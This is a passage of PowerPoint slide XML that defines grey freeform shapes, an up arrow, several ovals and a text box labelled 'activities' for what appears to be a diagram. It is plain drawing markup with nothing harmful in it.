                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 636"/>
                <a:gd name="T16" fmla="*/ 0 h 108"/>
                <a:gd name="T17" fmla="*/ 636 w 636"/>
                <a:gd name="T18" fmla="*/ 108 h 108"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="636" h="108">
                  <a:moveTo>
                    <a:pt x="0" y="48"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="58" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="48"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="EFEFEF"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122923" name="Freeform 1065">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{234B3CF0-F9D8-499A-B95F-4B9074536FA8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3379" y="2613"/>
              <a:ext cx="45" cy="208"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 90"/>
                <a:gd name="T1" fmla="*/ 0 h 417"/>
                <a:gd name="T2" fmla="*/ 1 w 90"/>
                <a:gd name="T3" fmla="*/ 0 h 417"/>
                <a:gd name="T4" fmla="*/ 1 w 90"/>
                <a:gd name="T5" fmla="*/ 0 h 417"/>
                <a:gd name="T6" fmla="*/ 0 w 90"/>
                <a:gd name="T7" fmla="*/ 0 h 417"/>
                <a:gd name="T8" fmla="*/ 1 w 90"/>
                <a:gd name="T9" fmla="*/ 0 h 417"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 90"/>
                <a:gd name="T16" fmla="*/ 0 h 417"/>
                <a:gd name="T17" fmla="*/ 90 w 90"/>
                <a:gd name="T18" fmla="*/ 417 h 417"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="90" h="417">
                  <a:moveTo>
                    <a:pt x="90" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="90" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="79"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="8F8F8F"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122924" name="Freeform 1066">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4CCC942-02F5-4F43-A5F2-285E4C924232}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3360" y="2640"/>
              <a:ext cx="34" cy="209"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 68"/>
                <a:gd name="T1" fmla="*/ 0 h 417"/>
                <a:gd name="T2" fmla="*/ 1 w 68"/>
                <a:gd name="T3" fmla="*/ 1 h 417"/>
                <a:gd name="T4" fmla="*/ 0 w 68"/>
                <a:gd name="T5" fmla="*/ 1 h 417"/>
                <a:gd name="T6" fmla="*/ 1 w 68"/>
                <a:gd name="T7" fmla="*/ 1 h 417"/>
                <a:gd name="T8" fmla="*/ 1 w 68"/>
                <a:gd name="T9" fmla="*/ 0 h 417"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 68"/>
                <a:gd name="T16" fmla="*/ 0 h 417"/>
                <a:gd name="T17" fmla="*/ 68 w 68"/>
                <a:gd name="T18" fmla="*/ 417 h 417"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="68" h="417">
                  <a:moveTo>
                    <a:pt x="68" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="65" y="362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="8F8F8F"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122925" name="Freeform 1067">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA7C5C09-B50B-425E-BDE2-5D6ED6282AB4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3103" y="2663"/>
              <a:ext cx="226" cy="154"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 452"/>
                <a:gd name="T1" fmla="*/ 0 h 307"/>
                <a:gd name="T2" fmla="*/ 1 w 452"/>
                <a:gd name="T3" fmla="*/ 1 h 307"/>
                <a:gd name="T4" fmla="*/ 1 w 452"/>
                <a:gd name="T5" fmla="*/ 1 h 307"/>
                <a:gd name="T6" fmla="*/ 0 w 452"/>
                <a:gd name="T7" fmla="*/ 1 h 307"/>
                <a:gd name="T8" fmla="*/ 0 w 452"/>
                <a:gd name="T9" fmla="*/ 0 h 307"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 452"/>
                <a:gd name="T16" fmla="*/ 0 h 307"/>
                <a:gd name="T17" fmla="*/ 452 w 452"/>
                <a:gd name="T18" fmla="*/ 307 h 307"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="452" h="307">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="452" y="43"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452" y="307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122926" name="Freeform 1068">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D7A6963-7022-4BB5-8737-02DF79850270}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3110" y="2664"/>
              <a:ext cx="219" cy="148"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 438"/>
                <a:gd name="T1" fmla="*/ 0 h 297"/>
                <a:gd name="T2" fmla="*/ 1 w 438"/>
                <a:gd name="T3" fmla="*/ 0 h 297"/>
                <a:gd name="T4" fmla="*/ 1 w 438"/>
                <a:gd name="T5" fmla="*/ 0 h 297"/>
                <a:gd name="T6" fmla="*/ 0 w 438"/>
                <a:gd name="T7" fmla="*/ 0 h 297"/>
                <a:gd name="T8" fmla="*/ 0 w 438"/>
                <a:gd name="T9" fmla="*/ 0 h 297"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 438"/>
                <a:gd name="T16" fmla="*/ 0 h 297"/>
                <a:gd name="T17" fmla="*/ 438 w 438"/>
                <a:gd name="T18" fmla="*/ 297 h 297"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="438" h="297">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="438" y="41"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438" y="297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122927" name="Freeform 1069">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{409A99F0-9912-467A-823C-DBBC9D4B34B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3392" y="2614"/>
              <a:ext cx="32" cy="190"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 63"/>
                <a:gd name="T1" fmla="*/ 1 h 379"/>
                <a:gd name="T2" fmla="*/ 0 w 63"/>
                <a:gd name="T3" fmla="*/ 1 h 379"/>
                <a:gd name="T4" fmla="*/ 1 w 63"/>
                <a:gd name="T5" fmla="*/ 0 h 379"/>
                <a:gd name="T6" fmla="*/ 1 w 63"/>
                <a:gd name="T7" fmla="*/ 1 h 379"/>
                <a:gd name="T8" fmla="*/ 0 w 63"/>
                <a:gd name="T9" fmla="*/ 1 h 379"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 63"/>
                <a:gd name="T16" fmla="*/ 0 h 379"/>
                <a:gd name="T17" fmla="*/ 63 w 63"/>
                <a:gd name="T18" fmla="*/ 379 h 379"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="63" h="379">
                  <a:moveTo>
                    <a:pt x="0" y="379"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="379"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:ln w="1588">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122928" name="Freeform 1070">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{311FF020-26BF-43E7-8150-B163C541849B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3124" y="2592"/>
              <a:ext cx="300" cy="48"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 600"/>
                <a:gd name="T1" fmla="*/ 1 h 96"/>
                <a:gd name="T2" fmla="*/ 1 w 600"/>
                <a:gd name="T3" fmla="*/ 1 h 96"/>
                <a:gd name="T4" fmla="*/ 1 w 600"/>
                <a:gd name="T5" fmla="*/ 1 h 96"/>
                <a:gd name="T6" fmla="*/ 1 w 600"/>
                <a:gd name="T7" fmla="*/ 0 h 96"/>
                <a:gd name="T8" fmla="*/ 0 w 600"/>
                <a:gd name="T9" fmla="*/ 1 h 96"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 600"/>
                <a:gd name="T16" fmla="*/ 0 h 96"/>
                <a:gd name="T17" fmla="*/ 600 w 600"/>
                <a:gd name="T18" fmla="*/ 96 h 96"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="600" h="96">
                  <a:moveTo>
                    <a:pt x="0" y="36"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="537" y="96"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="36"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E1E1E1"/>
            </a:solidFill>
            <a:ln w="1588">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122929" name="Freeform 1071">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D14E13C-15C8-4833-9946-B512EE113D0D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3194" y="2894"/>
              <a:ext cx="95" cy="12"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 189"/>
                <a:gd name="T1" fmla="*/ 1 h 23"/>
                <a:gd name="T2" fmla="*/ 0 w 189"/>
                <a:gd name="T3" fmla="*/ 0 h 23"/>
                <a:gd name="T4" fmla="*/ 0 w 189"/>
                <a:gd name="T5" fmla="*/ 1 h 23"/>
                <a:gd name="T6" fmla="*/ 1 w 189"/>
                <a:gd name="T7" fmla="*/ 1 h 23"/>
                <a:gd name="T8" fmla="*/ 1 w 189"/>
                <a:gd name="T9" fmla="*/ 1 h 23"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 189"/>
                <a:gd name="T16" fmla="*/ 0 h 23"/>
                <a:gd name="T17" fmla="*/ 189 w 189"/>
                <a:gd name="T18" fmla="*/ 23 h 23"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="189" h="23">
                  <a:moveTo>
                    <a:pt x="187" y="19"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187" y="19"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>
            </a:solidFill>
            <a:ln w="1588">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122930" name="AutoShape 1072">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E5A45CC-4594-48FC-A7C6-5AE00AE4F852}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3209" y="2086"/>
              <a:ext cx="144" cy="528"/>
            </a:xfrm>
            <a:prstGeom prst="upArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 91667"/>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931" name="Text Box 1073">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C619494-E608-4F61-9B7F-5BBB60048276}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2297" y="2278"/>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solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>activities</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122932" name="Oval 1074">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F62FC93-D8E4-4BFA-8E21-F40005A0A986}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2784" y="1200"/>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933" name="Oval 1075">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C412553-A540-4FBC-B053-DFA4D6D52205}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3072" y="1536"/>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934" name="Oval 1076">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93B8DA5C-8935-43C6-9A5E-C138F8C4BEFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2592" y="1584"/>
              <a:ext cx="144" cy="14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935" name="Oval 1077">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFD257F0-0CF6-4FFC-9D37-930B46CFAF90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3312" y="1824"/>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936" name="Oval 1078">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B39C59B-BBCC-4894-9A89-FF2168DE3D0A}"/>
                </a:ext>
